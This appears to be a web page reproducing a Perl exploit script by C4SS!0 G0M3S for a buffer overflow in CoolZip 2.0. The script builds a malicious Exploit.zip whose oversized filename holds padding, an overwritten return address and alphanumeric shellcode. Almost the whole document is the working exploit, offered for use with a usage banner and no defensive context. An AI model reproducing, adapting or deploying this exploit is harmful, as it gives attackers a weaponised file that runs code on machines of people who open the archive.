扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 |
#!/usr/bin/perl # # #[+]Exploit Title: Exploit Buffer Overflow CoolZip 2.0 #[+]Date: 12\03\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.brothersoft.com/coolzip-download-7097.html #[+]Version: 2.0 #[+]Tested On WIN-XP SP3 Portugues Brasil #[+]CVE: N/A # # xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx #xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx # xxx xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx #xxxxxxxx xxxxxx xxxxxx xxx xxxxxx # xxx xxx xxxxxx xxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx # xxxxxxxxx xxxxxx xxxxxx xxxxxxxxxxxxx #xxxxxx xxx xxxxxx xxxxxx xxxxxxxxx xxxx xxxxxxx #xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx xx xx xx # xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxx xxxxxxxxxxxxx # # # use strict; use warnings; use IO::File; sub usage { print q { Exploit Buffer Overflow Coolzip 2.0 ============================================================== ============================================================== ====================Author C4SS!0 G0M3S======================= ====================E-mail Louredo_@hotmail.com=============== ====================Site www.exploit-br.org=================== ============================================================== ============================================================== }; } my $sys = <code>ver</code>;if($sys=~/Windows/){system("cls");system("color 4f");}else{system("clear");} system("title Exploit Buffer Overflow Coolzip 2.0"); if(!$ARGV[0]) { usage; print "\t\t[-]Modo de Uso: perl $0 <Nome_do_Arquivo>\n"; print "\t\t[-]Exemplot: perl $0 Exploit.zip\n"; exit; } usage; my $File = "Exploit.zip"; print "\t\t[+]Identifying the size Shellcode\n\n"; sleep(1); my $head = "\x50\x4B\x03\x04\x14\x00\x00". "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00" . "\xe4\x0f" . "\x00\x00\x00"; my $head2 = "\x50\x4B\x01\x02\x14\x00\x14". "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\xe4\x0f". "\x00\x00\x00\x00\x00\x00\x01\x00". "\x24\x00\x00\x00\x00\x00\x00\x00"; my $head3 = "\x50\x4B\x05\x06\x00\x00\x00". "\x00\x01\x00\x01\x00". "\x12\x10\x00\x00". "\x02\x10\x00\x00". "\x00\x00"; my $payload = "\x41" x 51; $payload .= pack('V',0x77454337); $payload .= "\x41" x (59-length($payload)); my $shellcode = "TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIWCO0V0SX3SSQRL3SPTPXO". "NDMWUMVSL60KON6A"; print "\t\t[+]Length Shellcode:".length($shellcode)."\n\n"; sleep(1); $payload .= $shellcode; $payload .= "\x41" x (4064-length($payload)); $payload = $payload.".txt"; unlink($File); my $exploit = $head.$payload.$head2.$payload.$head3; print "\t\t[+]Creating File $File...\n\n"; sleep(1); open(my $f,">$File") || die "[+]Error:\n$!\n"; print $f $exploit; close($f); print "\t\t[+]The File $File Was Created Successfully\n\n"; sleep(1); |
体验盒子
